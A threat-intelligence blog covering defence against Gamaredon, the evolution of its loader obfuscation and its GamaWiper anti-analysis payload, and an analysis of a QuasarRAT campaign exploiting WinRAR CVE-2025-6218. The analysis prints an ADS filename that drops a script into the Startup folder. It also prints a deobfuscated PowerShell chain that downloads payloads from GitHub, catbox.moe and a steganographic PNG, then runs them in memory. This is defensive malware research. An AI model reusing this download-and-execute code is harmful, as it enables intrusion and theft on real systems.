Accept That Something Will Slip Through – Just Plan Around That

Perfect prevention is a nice idea, but it is not how real environments work.

Gamaredon does not need persistence for months. It needs minutes of execution. If those minutes go unnoticed, the damage is already done, regardless of whether the payload later gets removed.

Your defensive strategy needs to assume:

  • Some scripts will execute
  • Some attachments will be opened
  • Some rules will be bypassed

The question here is whether anyone notices in time to react.

Visibility does not replace prevention. But without visibility, prevention failures become silent compromises, and silent compromises are exactly what this actor benefits from. Visibility complements your prevention efforts.


Network controls that matter

From a network POV, Gamaredon is not noisy. It does not deploy custom backdoors that beacon every few seconds and it does not rely on exotic protocols. Most of the traffic is simple HTTP(S) generated directly from scripts using components like MSXML2.XMLHTTP.

That has two important consequences for defenders.

First, there is no separate downloader process to catch.
The same process that executed the script is now making web requests. Just mshta.exe or wscript.exe talking to the internet like a perfectly normal Windows application.

Second, many network controls are designed around detecting known bad destinations, not suspicious clients. If you only look at where traffic goes, but not who is sending it and under which circumstances, you miss the entire initial delivery phase.

For Gamaredon style campaigns network defense has to focus on context, NOT just destination.

Correlate Network Traffic With Process Activity

If a script host executes and immediately initiates outbound connections, that is not normal workstation behavior.

At minimum, be able to answer:

  • Which process opened the connection?
  • What launched that process?
  • What file triggered the execution?

MSXMLHTTP-based traffic will look perfectly legitimate on the wire unless you know it came from a script that just executed from a mail attachment.

Normalize Outbound HTTP Behavior

One of the more uncomfortable lessons when tracking Gamaredon is that attackers actively use network behavior itself as a detection mechanism.

In several waves, delivery depended on whether certain headers, especially Content-Length (in the latest GamaLoad samples), matched what the script originally set. Many commercial proxy setups modify requests by:

  • re-encoding bodies
  • switching between chunked and fixed-length transfers
  • inspecting and rewriting traffic

From the attacker's side, that becomes a cheap and reliable way to identify analysis environments and block payload delivery.

Defensively, this means:

  • Outbound traffic needs to be as predictable and uniform as possible
  • Proxy behavior should be consistent across user and analysis environments
  • Sudden header manipulation should be considered a detection signal, not just a networking detail!

Otherwise, you end up with the worst possible situation:
real users get infected, while analysis systems receive fake or destructive payloads


DNS as a detection surface

Treat DynDNS and Low-Rep Domains as High-Risk by Default

Gamaredon infrastructure heavily relies on:

  • dynamic DNS providers
  • rapidly changing subdomains
  • short-lived hosting setups

Blocking individual domains is pointless. They rotate too fast. What does not change is the type of infrastructure being used.

From a defensive standpoint, this means:

  • DynDNS traffic has to be restricted, monitored or at least flagged
  • Newly registered domains should not be treated the same as established ones
  • DNS telemetry is worth using as part of detection logic, not just for name resolution

If your network policy implicitly trusts any domain that resolves, you are trusting exactly the layer Gamaredon is built on.

What to Monitor Instead of Chasing Domains

DNS telemetry provides several signals that remain useful even when infrastructure rotates:

  • Domain age
    Newly registered domains should be treated differently from domains that have existed for years. Many Gamaredon delivery endpoints fall into the “new/very new” category.
  • Provider patterns
    Certain DynDNS and free subdomain services appear repeatedly across campaigns.
  • Subdomain churn
    Rapidly changing subdomains under the same parent domain are a common pattern. This is not normal behavior for most legitimate services used by end users.
  • NXDOMAIN spikes
    Failed DNS lookups shortly before successful connections can indicate scripted discovery or fallback logic inside loaders.
    Since this pattern is very common in Gamaredon loaders, it is a strong signal for finding related activity, and it remains detectable even when timeouts and sleeps are enabled.

None of these signals alone proves malicious intent, but together they describe infrastructure behavior that is highly consistent with how Gamaredon operates.
Once this dynamic is understood, the operational flexibility that makes Gamaredon effective becomes a liability that defenders can exploit 🙂
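The NXDOMAIN pattern in particular is easy to prototype against DNS logs. A minimal sketch, assuming time-ordered per-client records of (timestamp, response code); the thresholds are illustrative:

```python
# Sketch: flag clients that produce a burst of NXDOMAIN answers shortly
# before a successful resolution -- the scripted fallback pattern
# described above. Thresholds are starting points, not tuned values.

def nxdomain_burst_before_success(records, min_failures=3, window=120):
    """records: time-ordered list of (ts_seconds, rcode) for one client.
    True if >= min_failures NXDOMAINs precede a NOERROR within window."""
    for i, (ts, rcode) in enumerate(records):
        if rcode != "NOERROR":
            continue
        failures = sum(1 for t, r in records[:i]
                       if r == "NXDOMAIN" and ts - t <= window)
        if failures >= min_failures:
            return True
    return False
```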

Restriction Beats Blacklisting

If possible, access to high-risk DNS categories has to be restricted by policy, not just monitored.

This can include:

  • blocking or limiting known DynDNS providers
  • forcing additional inspection or logging for low-reputation domains
  • isolating traffic to newly registered domains

The goal is not to eliminate all risk (that is unrealistic) but to reduce the attacker's ability to operate entirely in disposable infrastructure without triggering any response.

Gamaredon depends on infrastructure that can be replaced quickly and cheaply. Defensive strategies have to make that approach operationally expensive instead of operationally invisible.

DNS Is Not Just Plumbing

In many environments, DNS is treated as a purely technical service: something that resolves names and moves on. From a threat detection perspective, that is a wasted opportunity.

DNS shows:

  • where systems are trying to go
  • how often endpoints change
  • whether communication targets look stable or disposable

Especially in script-driven infection chains, DNS can be the first external signal that something has moved from local execution to external communication.

If DNS data is not included in your detection logic, then a large portion of Gamaredon activity will look like harmless background traffic until much later in the attack chain.

In my opinion, proper DNS logging should always be part of a defensive strategy, regardless of which threat actor you are dealing with.


Prepare for anti-analysis

One thing that becomes obvious to me when tracking Gamaredon over time is that they do not just try to avoid detection, they actively react to analysis.

Payload delivery and script behavior can change depending on the environment. Analysis systems may receive different payloads, broken samples or nothing at all, while real victims get fully functional stages. What you see in a sandbox is not always what happens in the wild.

This means relying on a single analysis setup is risky. If all samples run through the same sandbox, the same proxy and the same network profile, that environment becomes easy to fingerprint and easy to avoid.

Analysis systems should look as boring and realistic as possible.

The takeaway from my analysis is simple: when the attacker adapts to being observed, your analysis pipeline becomes part of the attack surface. If you do not account for that, you may be analyzing exactly what the attacker wants you to see.


More information

If you want to know more about Gamaredon, check out my latest articles:

Gamaredon: Same Goal, Fewer Fingerprints


by Robin Dost

In malware analysis, it is tempting to describe change as innovation.
New tricks, new tooling, new malware families.
What is far more revealing, however, is how little actually changes and what changes anyway.

Between late November and the end of December 2025, several Gamaredon-related VBScript loaders surfaced that are, functionally, almost identical. They all execute the same mechanism, rely on the same execution primitive, and ultimately aim for the same outcome.

And yet, something does change, quietly, incrementally, and very deliberately.

This article focuses strictly on observable, concrete shifts in obfuscation, not assumptions, not intent inferred from tooling, and not architectural leaps that are not supported by the samples themselves.

For this analysis, I used the following samples:

Date of Sample  Hash                                                              Download
19.12.2025      6de9f436ba393744a3966b35ea2254dde2f84f5b796c6f7bee4b67ccf96ccf0a  Download
22.12.2025      9218528a40a48a3c96df3b49a7498f6ea2a961f43249081b17880709f73392c1  Download
25.12.2025      2c69fd052bfaa03cd0e956af0f638f82bc53f23ee8d0c273e688e257dac8c550  Download
30.12.2025      846748912aa6e86b9d11f6779af6aae26b7258f8610d5e28eff0083779737824  Download


25 November 2025 – Noise Without Structure

The earliest sample is dominated by volume.

Characteristics:

  • Hundreds of variables that are written to once and never read again
  • Repeated arithmetic mutations (x = x + 14) without semantic relevance
  • Long linear execution flow
  • No variable declarations (Dim entirely absent)

The obfuscation here serves one purpose only: syntactic noise.

There is no attempt to:

  • Hide control flow
  • Delay string resolution
  • Reconstruct logic conditionally

Everything is present in the source, just buried under irrelevant assignments.

From an analyst’s perspective, this sample is noisy but predictable.
Once dead code is ignored, execution logic collapses into a short, linear sequence.


19 December 2025 – Indicator overload

The mid-December sample introduces a clear and measurable change: indicator density.

New observations:

  • A significant increase in hard-coded URLs
  • URLs pointing to unrelated, legitimate, and state-adjacent domains
  • No execution dependency on most of these URLs

Crucially, these URLs are not obfuscated. They are placed in plain sight.

This is not string hiding; it is indicator flooding.

The obfuscation shift here is not technical complexity, but analytical friction:

  • Automated extraction produces dozens of false leads
  • IOC-based clustering becomes unreliable
  • Manual triage cost increases without changing execution logic

The loader still behaves linearly. What changes is the signal-to-noise ratio.


22 December 2025 – Defensive Reaction at the Payload Layer

The December 22 sample is not an obfuscation milestone, but it is a defensive one.

From a loader perspective, almost nothing changes:

  • The download URL is fully present and statically recoverable
  • No additional string hiding or control-flow manipulation is introduced
  • Execution remains linear and transparent

However, focusing solely on loader complexity misses the actual shift.

The real change happens at the payload layer

For the first time in this series, the loader delivers GamaWiper instead of Pterodo to analysis environments.

This is not a neutral substitution.

As outlined in my earlier analysis of GamaWiper's behavior, this payload is explicitly designed to wipe detected analysis environments instead of handing them a functional stage.

In other words:
Gamaredon reacts defensively, just not in the loader yet.

Why obfuscation does not increase here

The absence of additional loader obfuscation is not a contradiction, but a signal.

At this stage:

  • The defensive burden is shifted entirely onto the payload
  • The loader acts as a transparent delivery mechanism
  • Analysis deterrence is achieved through destructive behavior, not concealment

This suggests a deliberate sequencing:

  1. Introduce a hostile payload to counter analysis
  2. Observe detection and response
  3. Only then begin hardening the delivery mechanism itself

Why this sample matters

~ December 22 marks the point where Gamaredon stops merely being observed and starts actively responding.

Not by hiding better, but by ensuring that seeing the payload has consequences.

The subsequent increase in loader obfuscation after this date does not replace this strategy.
It complements it.

Payload hostility first.
Delivery hardening second.

Notably, this change occurs almost exactly four weeks after my article outlining practical approaches to tracking Gamaredon infrastructure went public.
Whether coincidence or feedback loop, the timing aligns remarkably well with the first observed deployment of GamaWiper as an anti-analysis response.


25 December 2025 – Control-Flow Noise Appears

The Christmas sample does not introduce new primitives, but it does introduce execution ambiguity.

Concrete changes:

  • Multiple .Run invocations exist
  • Not all of them result in meaningful execution
  • Several objects and variables are constructed but never used
  • Execution order is less visually obvious

This is not branching logic, but control-flow camouflage.

The analyst can still reconstruct execution, but:

  • Dead paths look plausible
  • Execution sinks are no longer unique
  • Automated heuristics struggle to identify the real one

The obfuscation no longer targets strings, it targets execution clarity.


30 December 2025 – Fragmented Runtime Assembly

The final sample introduces the most tangible structural changes.

Observed differences:

  • Systematic use of Dim declarations
  • Extensive use of short, non-semantic string fragments
  • Assembly of execution-relevant strings via repeated concatenation across distant code sections
  • No complete execution string exists statically
  • Embedded domains are just random, invalid placeholders

At no point does the full execution command exist as a contiguous value in the source.

Instead:

  • Fragments are combined
  • Recombined
  • Passed through intermediate variables
  • Finalized immediately before execution

This directly degrades:

  • Static string extraction
  • Signature-based detection
  • Regex-driven tooling

No encryption is added.
The shift is purely architectural.


05 January 2026 – Added Datetime Parameter to URL

EDIT 07.01.2026: I added this part as new findings appeared

Since early January, another small but relevant change appeared in the loader logic.

The scripts now generate a date value at runtime:

This value is then embedded directly into the download path, resulting in URLs like:

.../UkrNet_02.01.2026/cutting/02.01.2026/hannah8342.pdf

From a detection standpoint, this is subtle but effective.

This means:

  • payload paths change daily
  • static URL signatures age out immediately
  • and IOC reuse across campaigns becomes unreliable
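Because only the date changes, hunting logic can match the path structure instead of any single URL. A sketch of such a pattern match, generalized from the one example path shown above (the regex shape is my assumption, not a confirmed campaign-wide format):

```python
# Sketch: structural match for the date-stamped delivery paths described
# above, e.g. .../UkrNet_02.01.2026/cutting/02.01.2026/hannah8342.pdf.
# The exact shape is inferred from one observed sample.

import re

DATED_PATH = re.compile(
    r"/[A-Za-z]+_\d{2}\.\d{2}\.\d{4}/"   # <campaign>_DD.MM.YYYY
    r".*\d{2}\.\d{2}\.\d{4}/"            # repeated date directory
    r"[a-z]+\d+\.[a-z]{2,4}$"            # <word><digits>.<ext>
)

def matches_dated_path(url_path: str) -> bool:
    return bool(DATED_PATH.search(url_path))
```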

Relation to Prior Observations

This behavior aligns closely with patterns discussed in my earlier article on GamaWiper and Gamaredon’s anti-analysis strategies, where delivery behavior adapts based on perceived execution context.

https://blog.synapticsystems.de/gamawiper-explained-gamaredon-anti-analysis/


What Actually Changed and What Did Not

What did not change:

  • Execution primitive
  • Loader purpose
  • Overall delivery mechanism

What did change:

  • When execution-relevant strings become complete
  • How many false execution paths exist
  • How much irrelevant context surrounds the real logic

This is not a rewrite.
It is iterative hardening.


Conclusion

These samples do not demonstrate innovation.
They demonstrate attention.

Each iteration removes one assumption analysts rely on:

  • “The string will exist somewhere”
  • “The execution path is obvious”
  • “Dead code looks dead”

Gamaredon did not add complexity for its own sake.
They added just enough friction to slow analysis and then stopped.

And that restraint is, in itself, the most telling signal.

GamaWiper Explained: Gamaredon’s “New” Anti-Analysis Weapon


by Robin Dost

After my recent blog posts covering Gamaredon’s ongoing PterodoGraph campaign targeting Ukraine, and following almost a full month of silence in terms of newly observed malware samples, fresh activity has finally resurfaced.

New samples have appeared, along with reports pointing to a component now referred to as GamaWiper.

It is important to note that GamaWiper, or at least very similar scripts, had already been observed in Gamaredon operations in previous months.
From a purely technical standpoint, this functionality is therefore not entirely new.

What is new, however, is the context in which it is now being deployed.

In this article, I aim to shed some light on what GamaWiper actually is, why Gamaredon is actively delivering it at this stage of the infection chain, and what this shift tells us about the group’s current operational mindset.
What initially appears to be just another destructive payload turns out to be a deliberate control mechanism, one that decides who receives the real malware and who gets wiped instead.

I’ll keep this post a bit shorter and focus only on what’s new, so it doesn’t get boring.
If you’re looking for deeper technical details, please refer to my previous posts from 22.11.2025 and 13.11.2025, where I covered the core mechanics in depth.

For this analysis, I’m using my deobfuscated version of the sample; next time I’ll maybe show you how to deobfuscate Gamaredon scripts manually in less than 10 minutes.

After downloading the latest Gamaredon malware sample, it immediately became obvious that the current variants differ noticeably from what we’ve seen before.

SHA256: 6de9f436ba393744a3966b35ea2254dde2f84f5b796c6f7bee4b67ccf96ccf0a

Note: I started writing YARA Rules for Gamaredons current samples, you can find them here.


Key Changes at a Glance

  • Junk URLs now closely resemble real payload delivery URLs
  • No full Pterodo payload is delivered anymore 🙁
  • Gamaredon has hardened the delivery of Pterodo samples

Infection Flow – What Changed?

After the user opens the RAR archive and infects their system, the behavior initially looks familiar.
On reboot, the Pterodo sample is fetched again, but only if the client is geolocated in Ukraine, as already mentioned in my previous blog posts.

Previously, non-UA clients would simply receive:

  • an empty page, or
  • an empty file

Today, however, things look a bit different.

Instead, the client receives GamaWiper.


GamaWiper – Sandbox? Gone.

GamaWiper is essentially a sandbox / VM killer whose sole purpose is to prevent analysis environments from seeing anything useful.

In earlier campaigns, this wasn’t always handled very well.
For example, when I used Hybrid-Analysis, it was trivial to extract:

  • Telegram channels
  • Graph URLs
  • infrastructure relationships

This was a classic infrastructure design flaw and a great example of what budget cuts can do to an APT operation 😄

Today, however, the approach is much simpler:

If a sandbox is detected -> wipe it

No telemetry, no infrastructure leaks, no fun.

If you are doing legitimate malware research and are interested in (deobfuscated) samples from Gamaredon, you can write me an email.


Initial Loader: “GamaLoad”

The initial loader, which I’ll refer to as GamaLoad, implements a multi-stage payload fetch mechanism with dynamically constructed URLs and headers.
The goal is resilience: fetch stage two no matter what.

Note: All malicious domains have been removed.


Request Characteristics

Request Type

  • Method: GET
  • Client: msxml2.xmlhttp
  • Execution: synchronous

URL Structure

Each request fetches a randomly generated resource:

/<random>.<ext>
  • Random filename: 7-10 characters (a-z, 0-9)
  • Camouflage extensions, e.g.:
    • wmv
    • yuv
    • lgc
    • rm
    • jpeg
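The request shape described above is itself a usable hunting pattern: a short alphanumeric name with a media-style extension that never corresponds to actual media content. A minimal sketch, using the observed extensions:

```python
# Sketch: match the camouflage fetch shape described above -- a 7-10
# character alphanumeric filename with one of the observed extensions.

import re

CAMO_EXTS = {"wmv", "yuv", "lgc", "rm", "jpeg"}
RANDOM_NAME = re.compile(r"^/([a-z0-9]{7,10})\.([a-z]{2,4})$")

def looks_like_gamaload_fetch(path: str) -> bool:
    m = RANDOM_NAME.match(path)
    return bool(m) and m.group(2) in CAMO_EXTS
```

On its own this will match some legitimate CDN traffic, so it belongs in a scoring model alongside process context, not in a blocking rule.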

C2 Fallback Order

The script iterates through multiple sources until a valid payload is received:

  1. Argument URL (if passed at execution)
  2. Hardcoded fallback
  3. Cloudflare Workers domain
  4. Domain fetch using @ notation
  5. Abuse of the URL userinfo field
  6. Dynamic host via check-host.net
    • HTML parsing
    • live host extraction
  7. Alternative domain (again using @ notation)
  8. Registry-based URL

Once a working C2 is found, it is stored as a persistent C2 entry.


HTTP Headers

The request uses very explicit and intentionally crafted headers.

User-Agent

A browser-like string combined with a host fingerprint, including:

  • Computer name
  • Drive serial number (hex-encoded)
  • Timestamp
    • UTC+2
    • Ukrainian local time expected

Cookie

  • Static campaign identifier
  • Rotates regularly (more on that below)

Content-Length

  • Explicitly set
  • Even for GET requests

Enables victim identification & tracking
Also plays a role in proxy evasion (see below)


Success Condition

A request is considered successful when:

  • HTTP status is 200
  • Response size is greater than 91 bytes

Once this condition is met, all remaining fallbacks are skipped.
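The fallback-plus-success logic can be expressed compactly. This is a behavioral sketch of the loader logic as described above, not the actor's code; `fetch` stands in for the msxml2.xmlhttp request:

```python
# Sketch of the described loader behavior: iterate fallback sources
# until one returns HTTP 200 with a body larger than 91 bytes, then
# stop. `fetch` is a caller-supplied function: url -> (status, body).

def is_valid_payload(status: int, body: bytes) -> bool:
    return status == 200 and len(body) > 91

def fetch_first_valid(sources, fetch):
    for url in sources:
        status, body = fetch(url)
        if is_valid_payload(status, body):
            return url, body   # all remaining fallbacks are skipped
    return None, None
```

The 91-byte floor is a cheap way to reject empty pages and short error bodies without parsing anything.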


Payload Processing

  1. Payload received as binary
  2. UTF-8 conversion
  3. Cleanup (CR/LF, delimiters)
  4. Base64 decoding
  5. In-memory execution

No disk writes – classic fileless execution
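For reference, steps 1-4 of that chain look roughly like this in Python (execution is intentionally omitted; the `|` delimiter is an assumed example of the cleanup targets):

```python
# Sketch of the described processing chain: raw bytes -> UTF-8 ->
# cleanup of CR/LF and delimiters -> Base64 decode. The in-memory
# execution step is deliberately left out.

import base64

def decode_stage(raw: bytes, delimiters: str = "|") -> bytes:
    text = raw.decode("utf-8", errors="ignore")
    for junk in ("\r", "\n", delimiters):
        text = text.replace(junk, "")
    return base64.b64decode(text)
```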


Evasion Techniques

  • Multi-stage fallback logic
  • Dynamic hosts
  • Delays between requests
  • Victim-specific User-Agent

Below is an example of a fully constructed request header sent to the payload delivery host.


Payload Rotation

Gamaredon currently rotates payloads every 1-3 hours.

With each rotation, the following variables may change:

  • Domains for Payload Delivery
  • User-Agent
  • Cookie
  • Content-Length

Why Is Content-Length Set?

The Content-Length HTTP header specifies the size of the request or response body in bytes.
Its typical purpose is:

  • Defining message boundaries
  • Preventing truncated reads
  • Enabling correct stream handling

In this case, however, I strongly believe the header is set intentionally for tracking and proxy evasion.

Why?

The loader uses msxml2.xmlhttp.
When calling .send() via this client, the Content-Length header is not overwritten.

For a normal residential client, this is usually not an issue.
However, many HTTP/HTTPS proxies, especially residential and chained proxies fail to handle this properly and may:

  • break the connection
  • modify the request
  • normalize headers

This behavior is highly detectable.

My conclusion:
Gamaredon likely uses this mechanism to filter out proxy-based analysis setups.
The choice of client and header behavior is far too specific to be accidental.

So, if you end up receiving GamaWiper instead of a payload, now you know why.
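Defenders can turn the same quirk around: a GET request carrying an explicit Content-Length header is unusual for browsers and a cheap hunting signal for script-driven HTTP clients. A sketch over hypothetical proxy-log fields:

```python
# Sketch: flag GET requests with an explicit Content-Length header,
# the msxml2.xmlhttp quirk discussed above. Header dict is a stand-in
# for whatever your proxy logging exposes.

def explicit_length_on_get(method: str, headers: dict) -> bool:
    if method.upper() != "GET":
        return False
    return any(k.lower() == "content-length" for k in headers)
```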


Conclusion

Gamaredon has clearly tightened its operational security.

The infrastructure flaws that previously allowed easy extraction of internal details have been addressed, and sandbox detection has shifted from “leaky but useful” to “wipe and move on”.

While these changes will certainly disrupt some tracking and automated analysis systems, the overall approach feels… let’s say pragmatic, but somewhat heavy-handed.

Effective?
Yes.

Elegant?
Debatable 😄


QuasarRAT Malware Campaign using CVE-2025-6218


I am currently analyzing the recent surge of malware samples exploiting the WinRAR vulnerability CVE-2025-6218. During this research, I found a new sample on abuse.ch which appears to be part of a small QuasarRAT malware campaign.

What is CVE-2025-6218? (Short summary for this analysis)

This vulnerability enables:

  • Remote Code Execution (RCE)
  • Manipulated NTFS Alternate Data Streams (ADS)
  • Hidden paths / directory traversal / tampered extraction metadata

The exploit relies on:

  • Specially crafted file headers
  • Unexpected or malformed filename fields in the RAR block
  • ADS payloads such as file.txt:evil.exe embedded inside the RAR structure
  • WinRAR linking the ADS → extracting it → and executing the resulting file automatically

The SHA256 hash of the file is:

c67cc833d079aa60d662e2d5005b64340bb32f3b2f7d26e901ac0b1b33492f2f
You can download the file here.

After extracting the outer archive, we obtain another RAR file. Before unpacking it, we take a look at its contents in the hex view to check for anything suspicious.

xxd c67cc833d079aa60d662e2d5005b64340bb32f3b2f7d26e901ac0b1b33492f2f.rar | less

We can already see the suspicious ADS payload inside the RAR block.
With this confirmation, we proceed to extract the archive using 7-Zip.

After extraction, we obtain two files:

Coinme.py.txt
'Coinme.py.txt:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_0fyhds341.vbs'

The file Coinme.py.txt contains a simple Python script that queries email addresses of coinme.com users.
You can find the script here.

Now we get to the interesting part — the file:

Coinme.py.txt:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_0fyhds341.vbs

It contains a short Visual Basic script:

The script downloads an HTML Application (HTA) file from a GitHub repository.
At the time of writing, both the repository and the user account have already been deleted. However, I uploaded a backup of the user’s repositories here.

Here is a screenshot of the repository and the associated profile:

Interestingly, the account only follows one inactive user with the username “Levbohol / лев”:


Next, I inspected the verification.hta file that was downloaded from the repository.

The file contains a lightly obfuscated HTA script. I decoded the fromCharCode array into ASCII, resulting in the following code:

conhost.exe --headless cmd.exe /c powershell.exe -w h -ep bypass -c "
$t=Join-Path $env:TEMP 'svchost.bat'; 
Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/Proscaution32/tessttxd312/refs/heads/main/ilovelovelove.txt' -OutFile $t -UseBasicParsing;
if(Test-Path $t){
    & conhost.exe --headless cmd.exe /c $t
}"

The script downloads yet another file named ilovelovelove.txt and executes it.
Let’s take a closer look at that text file.

We are now looking at a heavily obfuscated DOS batch file. The first things that stand out are numerous variable assignments using set ... and comments prefixed with the REM keyword.

The comments are merely junk intended to distract the analyst.
The variable assignments, however, are more complicated.

Some of the variables are never used anywhere in the script; these are clearly junk statements meant to confuse the reader.
Other variables are used during execution and must be isolated and replaced with their actual runtime values.
We also encounter various uninitialized variables, which are junk as well, since they never carry a value.

Before proceeding, I remove all comments from the file.

sed -i '/^[Rr][Ee][Mm]/d' ilovelovelove.txt 

Next, I isolate all variables that can be identified as junk, meaning variables that are referenced but never assigned a value.

# collect every %var% reference in the script
grep -oE '%[^%]+%' ilovelovelove.txt > isolated_set_commands.txt

# a variable name that appears on fewer than two lines is referenced
# but never assigned -> junk
while read -r line; do
  x="${line//%/}"
  res=$(grep -cF -- "$x" ilovelovelove.txt)
  if [ "$res" -lt 2 ]; then
    echo "$line"
  fi
done < isolated_set_commands.txt >> removable.txt
rm isolated_set_commands.txt

I then remove all uninitialized variables from the script completely.

# blank out every junk reference in place
while read -r line; do sed -i "s|$line||g" ilovelovelove.txt; done < removable.txt

The script is now much cleaner, but some junk variables still remain. These were not properly filtered out because they were detected as variable placeholders inside strings.
To handle this, we isolate them and remove any variable that does not have a corresponding set assignment.

I also found many Base64 strings in the script, but none of them appear to form recognizable structures at this point, so we ignore them for now.
Next, we replace every remaining variable with its assigned value.

For this purpose, I wrote a small helper script:

#!/bin/bash
# replace every remaining %var% reference with its assigned value

grep -oE '%[^%]+%' ilovelovelove_copy.txt > usable.txt

while read -r line; do
    fstr="${line//%/}"

    # no matching "set var=..." assignment -> junk, blank it out
    if ! grep -q "set $fstr" ilovelovelove_copy.txt; then
        sed -i "s|$line||g" ilovelovelove_copy.txt
        continue
    fi

    # take everything after the first '=' so values containing '=' survive
    value=$(grep "set $fstr" ilovelovelove_copy.txt | head -n1 | cut -d'=' -f2-)
    echo "$line -> $value"

    sed -i "s|$line|$value|g" ilovelovelove_copy.txt
done < usable.txt

After running the helper script, the cleaned batch script now looks like this:

After removing all ^M carriage returns and manually restoring the few fragments that the substitution pass clipped (missing assignment operators, truncated cmdlet names, and one leftover %…% placeholder), we obtain the following finalized version:

start conhost.exe --headless powershell.exe -ep bypass -w h -NoExit -c "
$Ab1CdE = Get-CimInstance -Namespace 'root\SecurityCenter2' -ClassName AntiVirusProduct -ErrorAction SilentlyContinue;
$fGh2IjK = $false;

if ($Ab1CdE) {
    foreach ($Lm3NoP in $Ab1CdE) {
        $Qr4StU = $Lm3NoP.displayName;

        if ($Qr4StU -like '*ESET Security*') {
            $Vw5XyZ = 'https://files.catbox.moe/4q6yuz.txt';
            $Ab6CdE = New-Object System.Net.WebClient;
            $Ab6CdE.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
            $Ef7GhI = $Ab6CdE.DownloadString($Vw5XyZ);
            $Ab6CdE.Dispose();

            $u = ('From'+'Base64'+'String');
            $Ij8KlM = [System.Convert].GetMethod($u).Invoke($null, @([string]$Ef7GhI));
            $No9PqR = [System.Text.Encoding]::UTF8.GetString($Ij8KlM);

            Invoke-Expression $No9PqR;
            $fGh2IjK = $true;
            break;
        };

        if ($Qr4StU -like '*Malwarebytes*' -or $Qr4StU -like '*F-Secure*') {
            $St0UvW = 'https://files.catbox.moe/qt6070.txt';
            $Xy1ZaB = New-Object System.Net.WebClient;
            $Xy1ZaB.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
            $Cd2EfG = $Xy1ZaB.DownloadString($St0UvW);
            $Xy1ZaB.Dispose();

            $u = ('From'+'Base64'+'String');
            $Gh3IjK = [System.Convert].GetMethod($u).Invoke($null, @([string]$Cd2EfG));
            $Lm4NoP = [System.Text.Encoding]::UTF8.GetString($Gh3IjK);

            Invoke-Expression $Lm4NoP;
            $fGh2IjK = $true;
            break;
        };
    };
};

Add-Type -AssemblyName System.Drawing, System.IO.Compression.FileSystem;

$Qr5StU = 'https://i.ibb.co.com/NfC1jKn/yu42mu5xn.png';
$Vw6XyZ = New-Object System.Net.WebClient;
$Vw6XyZ.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');

$Ab7CdE = $Vw6XyZ.DownloadData($Qr5StU);
$Vw6XyZ.Dispose();

$Ef8GhI = New-Object IO.MemoryStream(,$Ab7CdE);
$Ij9KlM = [System.Drawing.Bitmap]::FromStream($Ef8GhI);

$No0PqR = $Ij9KlM.GetPixel(0,0);
$St1UvW = $Ij9KlM.GetPixel(1,0);

$size = ([uint32]$No0PqR.R -shl 24) -bor ([uint32]$No0PqR.G -shl 16) -bor ([uint32]$No0PqR.B -shl 8) -bor [uint32]$St1UvW.R;

$Xy2ZaB = New-Object System.Collections.Generic.List[byte];

for ($y = 0; $y -lt $Ij9KlM.Height; $y++) {
    for ($x = 0; $x -lt $Ij9KlM.Width; $x++) {
        if ( ($x -eq 0 -and $y -eq 0) -or ($x -eq 1 -and $y -eq 0) ) {
            continue;
        };

        $p = $Ij9KlM.GetPixel($x,$y);

        $Xy2ZaB.Add($p.R);
        $Xy2ZaB.Add($p.G);
        $Xy2ZaB.Add($p.B);
    };
};

$Ij9KlM.Dispose();
$Ef8GhI.Dispose();

$Cd3EfG = $Xy2ZaB.ToArray()[0..($size-1)];

$Gh4IjK = New-Object IO.MemoryStream(,$Cd3EfG);
$Lm5NoP = New-Object IO.MemoryStream;

$Qr6StU = New-Object IO.Compression.GZipStream($Gh4IjK, [IO.Compression.CompressionMode]::Decompress);
$Qr6StU.CopyTo($Lm5NoP);

$Qr6StU.Dispose();
$Gh4IjK.Dispose();

$Vw7XyZ = $Lm5NoP.ToArray();
$Lm5NoP.Dispose();

foreach ($Ab8CdE in [AppDomain]::CurrentDomain.GetAssemblies()) {
    if ($Ab8CdE.GlobalAssemblyCache -and $Ab8CdE.Location.Contains('mscor'+'lib.dll')) {
        foreach ($Ef9GhI in $Ab8CdE.GetType(('System.Reflection.Assembly')).GetMethods('Public,Static')) {
            if ($Ef9GhI.ToString()[37] -eq ']') {
                $Ij0KlM = $Ef9GhI.Invoke($null,(,$Vw7XyZ));

                $No1PqR = $Ij0KlM.EntryPoint;
                $St2UvW = $No1PqR.GetParameters().Count;

                if ($St2UvW -eq 0) {
                    $No1PqR.Invoke($null,$null);
                } else {
                    $No1PqR.Invoke($null,(,@()));
                };

                break;
            };
        };

        break;
    };
}
"

Analysis – What does the script actually do?


1. Detection of installed antivirus products

The script queries root\SecurityCenter2 via WMI to identify installed antivirus solutions.
Depending on the detected product, it downloads different Base64-encoded payloads, decodes them, and executes them in memory using Invoke-Expression.
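The AV-dependent branching can be modeled in a few lines of Python. The wildcard patterns and payload URLs below come from the deobfuscated script; the function itself is only an illustrative sketch, not part of the malware.

```python
import fnmatch

# AV display-name patterns and stage-2 URLs from the deobfuscated script
PAYLOADS = [
    ("*ESET Security*", "https://files.catbox.moe/4q6yuz.txt"),
    ("*Malwarebytes*",  "https://files.catbox.moe/qt6070.txt"),
    ("*F-Secure*",      "https://files.catbox.moe/qt6070.txt"),
]

def select_payload(av_display_names):
    """Return the stage-2 URL for the first matching AV product, else None."""
    for name in av_display_names:
        for pattern, url in PAYLOADS:
            if fnmatch.fnmatch(name, pattern):
                return url
    return None
```

Note that hosts without one of these specific products fall through the branching entirely, which is why the steganographic stage below runs unconditionally.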

2. Downloading a hidden payload from a PNG file

Regardless of the antivirus result, the script then downloads a PNG image from a remote URL.
This PNG contains embedded binary data stored inside pixel values (steganography).

The script:

  • reads each pixel,
  • reconstructs byte arrays from RGB values,
  • uses two pixels as payload length markers,
  • extracts the payload portion,
  • decompresses it via GZIP.

The result is a .NET assembly (DLL) extracted directly into memory.
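Assuming the pixels have already been read into a flat, row-major list of RGB tuples (e.g. via Pillow), the extraction steps above can be reproduced offline with a short Python sketch. The function name is mine; the length-marker layout mirrors the PowerShell.

```python
import gzip

def extract_hidden_payload(pixels):
    """Recover the GZIP-compressed payload hidden in RGB pixel values.

    `pixels` is a flat, row-major list of (R, G, B) tuples, mimicking the
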